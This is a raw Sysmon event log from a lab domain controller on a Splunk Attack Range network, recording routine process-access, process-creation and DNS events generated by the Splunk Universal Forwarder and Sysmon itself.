13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.047{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.048{59A5CD1D-8EE8-6005-DC00-00000000A301}3768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.954{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.955{59A5CD1D-8EEB-6005-E000-00000000A301}5112C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:41.614{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.verisign.com0type: 5 ocsp-ds.ws.symantec.com.edgekey.net;type: 5 e8218.dscb1.akamaiedge.net;::ffff:23.37.43.27;C:\Windows\sysmon64.exe 10341000x80000000000000004180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEB-6005-DF00-00000000A301}3544C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.282{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 